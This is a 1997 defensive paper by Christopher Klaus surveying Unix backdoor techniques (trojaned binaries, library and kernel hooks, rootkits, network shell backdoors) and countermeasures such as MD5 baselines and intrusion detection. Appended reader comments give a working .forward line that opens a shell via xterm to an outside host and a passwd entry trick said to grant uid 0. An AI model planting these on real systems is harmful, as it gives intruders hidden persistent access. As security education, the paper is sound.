Backdoors
By Christopher
Klaus 8/4/97
Since the
early days of intruders breaking into computers, they
have tried
to develop techniques
or backdoors that allow them to get back into the
system. In
this paper, it will be focused on many of the common
backdoors
and possible
ways to check for them. Most of focus will be on Unix
backdoors with
some discussion on future Windows NT backdoors. This
will
describe the
complexity of the issues in trying to determine the
methods
that intruders
use and the basis for administrators understanding on
how
they might be
able to stop the intruders from getting back in. When
an
administrator
understands how difficult it would be to stop intruder
once
they are in,
the appreciation of being proactive to block the intruder
from
ever getting
in becomes better understood. This is intended to
cover many
of the popular
commonly used backdoors by beginner and advanced intruders.
This is not
intended to cover every possible way to create a backdoor
as
the possibilities
are limitless.
The backdoor
for most intruders provide two or three main functions:
Be able to
get back into a machine even if the administrator tries
to
secure it, e.g.,
changing all the passwords.
Be able to
get back into the machine with the least amount of visibility.
Most backdoors
provide a way to avoid being logged and many times the
machine can appear
to have no one online even while an intruder is using
it.
Be able to
get back into the machine with the least amount of time.
Most
intruders want
to easily get back into the machine without having to
do all
the work of exploiting
a hole to gain access.
In some cases,
if the intruder may think the administrator may detect
any
installed backdoor,
they will resort to using the vulnerability repeatedly
to get on a machine
as the only backdoor. Thus not touching anything
that
may tip off the
administrator. Therefore in some cases, the
vulnerabilities
on a machine remain the only unnoticed backdoor.
Password
Cracking Backdoor
One of the
first and oldest methods of intruders used to gain not
only
access to a Unix
machine but backdoors was to run a password cracker.
This
uncovers weak
passworded accounts. All these new accounts are now
possible
backdoors into
a machine even if the system administrator locks out
the
intruder's current
account. Many times, the intruder will look for unused
accounts with
easy passwords and change the password to something
difficult.
When the administrator looked for all the weak passworded
accounts, the
accounts with modified passwords will not appear.
Thus the
administrator
will not be able to easily determine which accounts
to lock
out.
Rhosts + +
Backdoor
On networked
Unix machines, services like Rsh and Rlogin used a simple
authentication
method based on hostnames that appear in rhosts. A
user
could easily
configure which machines not to require a password to
log
into. An intruder
that gained access to someone's rhosts file could put
a
"+ +" in the
file and that would allow anyone from anywhere to log
into
that account
without a password. Many intruders use this method
especially
when NFS is exporting
home directories to the world. These accounts
become backdoors
for intruders to get back into the system. Many intruders
prefer using
Rsh over Rlogin because it is many times lacking any
logging
capability.
Many administrators check for "+ +" therefore an intruder
may
actually put
in a hostname and username from another compromised
account on
the network,
making it less obvious to spot.
Checksum and
Timestamp Backdoors
Early on, many
intruders replaced binaries with their own trojan versions.
Many system
administrators relied on time-stamping and the system
checksum
programs, e.g.,
Unix's sum program, to try to determine when a binary
file
has been modified.
Intruders have developed technology that will recreate
the same time-stamp
for the trojan file as the original file. This is
accomplished
by setting the system clock time back to the original
file's
time and then
adjusting the trojan file's time to the system clock.
Once
the binary trojan
file has the exact same time as the original, the system
clock is reset
to the current time. The sum program relies on a CRC
checksum and
is easily spoofed. Intruders have developed programs
that
would modify
the trojan binary to have the necessary original checksum,
thus fooling
the administrators. MD5 checksums is the recommended
choice
to use today
by most vendors. MD5 is based on an algorithm that
no one has
yet to date proven
can be spoofed.
Login Backdoor
On Unix, the
login program is the software that usually does the
password
authentication
when someone telnets to the machine. Intruders grabbed
the
source code to
login.c and modified it that when login compared the
user's
password with
the stored password, it would first check for a backdoor
password. If
the user typed in the backdoor password, it would allow
you to
log in regardless
of what the administrator sets the passwords to. Thus
this allowed
the intruder to log into any account, even root.
The
password backdoor
would spawn access before the user actually logged in
and
appeared in utmp
and wtmp. Therefore an intruder could be logged in
and
have shell access
without it appearing anyone is on that machine as that
account. Administrators
started noticing these backdoors especially if
they did a "strings"
command to find what text was in the login program.
Many times
the backdoor password would show up. The intruders then
encrypted or
hid the backdoor password better so it would not appear
by
just doing strings.
Many of the administrators can detect these backdoors
with MD5 checksums.
Telnetd Backdoor
When a user
telnets to the machine, inetd service listens on the
port and
receive the connection
and then passes it to in.telnetd, that then runs
login. Some
intruders knew the administrator was checking the login
program for tampering,
so they modified in.telnetd. Within in.telnetd, it
does several
checks from the user for things like what kind of terminal
the
user was using.
Typically, the terminal setting might be Xterm or
VT100.
An intruder
could backdoor it so that when the terminal was set
to
"letmein", it
would spawn a shell without requiring any authentication.
Intruders have
backdoored some services so that any connection from
a
specific source
port can spawn a shell.
Services Backdoor
Almost every
network service has at one time been backdoored by an
intruder. Backdoored
versions of finger, rsh, rexec, rlogin, ftp, even
inetd, etc.,
have been floating around forever. There are programs
that
are nothing more
than a shell connected to a TCP port with maybe a backdoor
password to gain
access. These programs sometimes replace a service
like
uucp that never
gets used or they get added to the inetd.conf file as
a new
service. Administrators
should be very wary of what services are running
and analyze the
original services by MD5 checksums.
Cronjob backdoor
Cronjob on
Unix schedules when certain programs should be run.
An intruder
could add a backdoor
shell program to run between 1 AM and 2 AM. So for
1
hour every night,
the intruder could gain access. Intruders have also
looked at legitimate
programs that typically run in cronjob and built
backdoors into
those programs as well.
Library backdoors
Almost every
UNIX system uses shared libraries. The shared libraries
are
intended to reuse
many of the same routines thus cutting down on the size
of programs.
Some intruders have backdoored some of the routines
like
crypt.c and _crypt.c.
Programs like login.c would use the crypt() routine
and if a backdoor
password was used it would spawn a shell. Therefore,
even if the administrator
was checking the MD5 of the login program, it was
still spawning
a backdoor routine and many administrators were not
checking
the libraries
as a possible source of backdoors.
One problem
for many intruders was that some administrators started
MD5
checksums of
almost everything. One method intruders used to get
around
that is to backdoor
the open() and file access routines. The backdoor
routines were
configured to read the original files, but execute the
trojan
backdoors.
Therefore, when the MD5 checksum program was reading
these
files, the checksums
always looked good. But when the system ran the
program, it executed
the trojan version. Even the trojan library itself,
could be hidden
from the MD5 checksums. One way to an administrator
could
get around this
backdoor was to statically link the MD5 checksum checker
and run on the
system. The statically linked program does not use
the
trojan shared
libraries.
Kernel backdoors
The kernel
on Unix is the core of how Unix works. The same method
used for
libraries for
bypassing MD5 checksum could be used at the kernel level,
except even a
statically linked program could not tell the difference.
A
good backdoored
kernel is probably one of the hardest to find by
administrators,
fortunately kernel backdoor scripts have not yet been
widely made available
and no one knows how wide spread they really are.
File system
backdoors
An intruder
may want to store their loot or data on a server somewhere
without the administrator
finding the files. The intruder's files can
typically contain
their toolbox of exploit scripts, backdoors, sniffer
logs, copied
data like email messages, source code, etc. To hide
these
sometimes large
files from an administrator, an intruder may patch the
files system
commands like "ls", "du", and "fsck" to hide the existence
of
certain directories
or files. At a very low level, one intruder's backdoor
created a section
on the hard drive to have a proprietary format that
was
designated as
"bad" sectors on the hard drive. Thus an intruder
could
access those
hidden files with only special tools, but to the regular
administrator,
it is very difficult to determine that the marked "bad"
sectors were
indeed storage area for the hidden file system.
Bootblock backdoors
In the PC world,
many viruses have hid themselves within the bootblock
section and most
antivirus software will check to see if the bootblock
has
been altered.
On Unix, most administrators do not have any software
that
checks the bootblock,
therefore some intruders have hidden some backdoors
in the bootblock
area.
Process hiding
backdoors
An intruder
many times wants to hide the programs they are running.
The
programs they
want to hide are commonly a password cracker or a sniffer.
There are quite
a few methods and here are some of the more common:
An intruder
may write the program to modify its own argv[] to make
it look
like another
process name.
An intruder
could rename the sniffer program to a legitimate service
like
in.syslog and
run it. Thus when an administrator does a "ps" or
looks at
what is running,
the standard service names appear.
An intruder
could modify the library routines so that "ps" does
not show
all the processes.
An intruder
could patch a backdoor or program into an interrupt
driven
routine so it
does not appear in the process table. An example backdoor
using this technique
is amod.tar.gz available on
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html
An intruder
could modify the kernel to hide certain processes as
well.
Rootkit
One of the
most popular packages to install backdoors is rootkit.
It can
easily be located
using Web search engines. From the Rootkit README,
here
are the typical
files that get installed:
z2 - removes
entries from utmp, wtmp, and lastlog.
Es - rokstar's
ethernet sniffer for sun4 based kernels.
Fix - try to
fake checksums, install with same dates/perms/u/g.
Sl - become root
via a magic password sent to login.
Ic - modified
ifconfig to remove PROMISC flag from output.
ps: - hides the
processes.
Ns - modified
netstat to hide connections to certain machines.
Ls - hides certain
directories and files from being listed.
du5 - hides how
much space is being used on your hard drive.
ls5 - hides
certain files and directories from being listed.
Network traffic
backdoors
Not only do
intruders want to hide their tracks on the machine,
but also
they want to
hide their network traffic as much as possible. These
network
traffic backdoors
sometimes allow an intruder to gain access through a
firewall. There
are many network backdoor programs that allow an intruder
to set up on
a certain port number on a machine that will allow access
without ever
going through the normal services. Because the traffic
is
going to a non-standard
network port, the administrator can overlook the
intruder's traffic.
These network traffic backdoors are typically using
TCP, UDP, and
ICMP, but it could be many other kinds of packets.
TCP Shell Backdoors
The intruder
can set up these TCP Shell backdoors on some high port
number
possibly where
the firewall is not blocking that TCP port. Many times,
they will be
protected with a password just so that an administrator
that
connects to it,
will not immediately see shell access. An administrator
can look for
these connections with netstat to see what ports are
listening
and where current
connections are going to and from. Many times, these
backdoors allow
an intruder to get past TCP Wrapper technology. These
backdoors could
be run on the SMTP port, which many firewalls allow
traffic
to pass for e-mail.
UDP Shell Backdoors
Administrator
many times can spot a TCP connection and notice the
odd
behavior, while
UDP shell backdoors lack any connection so netstat would
not show an intruder
accessing the Unix machine. Many firewalls have been
configured to
allow UDP packets for services like DNS through. Many
times,
intruders will
place the UDP Shell backdoor on that port and it will
be
allowed to by-pass
the firewall.
ICMP Shell
Backdoors
Ping is one
of the most common ways to find out if a machine is
alive by
sending and receiving
ICMP packets. Many firewalls allow outsiders to ping
internal machines.
An intruder can put data in the Ping ICMP packets
and
tunnel a shell
between the pinging machines. An administrator may
notice a
flurry of Ping
packets, but unless the administrator looks at the data
in
the packets,
an intruder can be unnoticed.
Encrypted Link
An administrator
can set up a sniffer trying to see data appears as someone
accessing a shell,
but an intruder can add encryption to the Network
traffic backdoors
and it becomes almost impossible to determine what is
actually being
transmitted between two machines.
Windows NT
Because Windows
NT does not easily allow multiple users on a single
machine
and remote access
similar as Unix, it becomes harder for the intruder
to
break into Windows
NT, install a backdoor, and launch an attack from it.
Thus you will
find more frequently network attacks that are spring
boarded
from a Unix box
than Windows NT. As Windows NT advances in multi-user
technologies,
this may give a higher frequency of intruders who use
Windows
NT to their advantage.
And if this does happen, many of the concepts from
Unix backdoors
can be ported to Windows NT and administrators can be
ready
for the intruder.
Today, there are already telnet daemons available
for
Windows NT.
With Network Traffic backdoors, they are very feasible
for
intruders to
install on Windows NT.
Solutions
As backdoor
technology advances, it becomes even harder for administrators
to determine
if an intruder has gotten in or if they have been successfully
locked out.
Assessment
One of the
first steps in being proactive is to assess how vulnerable
your
network is, thus
being able to figure out what holes exist that should
be
fixed. Many
commercial tools exist to help scan and audit the network
and
systems for vulnerabilities.
Many companies could dramatically improve
their security
if they only installed the security patches made freely
available by
their vendors.
MD5 Baselines
One necessary
component of a system scanner is MD5 checksum baselines.
This MD5 baseline
should be built up before a hacker attack with clean
systems. Once
a hacker is in and has installed backdoors, trying to
create
a baseline after
the fact could incorporate the backdoors into the
baseline. Several
companies had been hacked and had backdoors installed
on
their systems
for many months. Overtime, all the backups of the systems
contained the
backdoors. When some of these companies found out
they had
a hacker, they
restored a backup in hopes of removing any backdoors.
The
effort was futile
since they were restoring all the files, even the
backdoored ones.
The binary baseline comparison needs to be done before
an
attack happens.
Intrusion detection
Intrusion detection
is becoming more important as organizations are hooking
up and allowing
connections to some of their machines. Most of the
older
intrusion detection
technology was log-based events. The latest intrusion
detection system
(IDS) technology is based on real-time sniffing and
network traffic
security analysis. Many of the network traffic backdoors
can now easily
be detected. The latest IDS technology can take a
look at
the DNS UDP packets
and determine if it matches the DNS protocol requests.
If the data
on the DNS port does not match the DNS protocol, an
alert flag
can be signaled
and the data captured for further analysis. The same
principle can
be applied to the data in an ICMP packet to see if it
is the
normal ping data
or if it is carrying encrypted shell session.
Boot from CD-ROM.
Some administrators
may want to consider booting from CD-ROM thus
eliminating the
possibility of an intruder installing a backdoor on
the
CD-ROM. The
problem with this method is the cost and time of implementing
this solution
enterprise wide.
Vigilant
Because the
security field is changing so fast, with new vulnerabilities
being announced
daily and intruders are constantly designing new attack
and
backdoor techniques,
no security technology is effective without vigilance.
Be aware that
no defense is foolproof, and that there is no substitute
for
diligent attention.
-------------------------------------------------------------------------
you may want
to add:
.forward
Backdoor
On Unix
machines, placing commands into the .forward file was
also
a common
method of regaining access. For the account ``username''
a .forward
file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm
-disp hacksys.other.dom:0.0 -e /bin/sh"
permutations
of this method include alteration of the systems mail
aliases file
(most commonly located at /etc/aliases). Note that
this is a
simple permutation, the more advanced can run a simple
script from
the forward file that can take arbitrary commands via
stdin (after
minor preprocessing).
PS: The above
method is also useful gaining access a companies
mailhub
(assuming there is a shared a home directory FS on
the client
and server).
> Using
smrsh can effectively negate this backdoor (although
it's quite
> possibly
still a problem if you allow things like elm's filter
or
> procmail
which can run programs themselves...).
---------------------------------------------------------------------------
you may want
to add this "feature" that can act as a backdoor:
when specifying
a wrong uid/gid in the /etc/password file,
most login(1)
implementations will fail to detect the wrong
uid/gid and atoi(3)
will set uid/gid to 0, giving superuser
privileges.
example:
rmartin:x:x50:50:R.
Martin:/home/rmartin:/bin/tcsh
on Linux boxes,
this will give uid 0 to user rmartin.
|
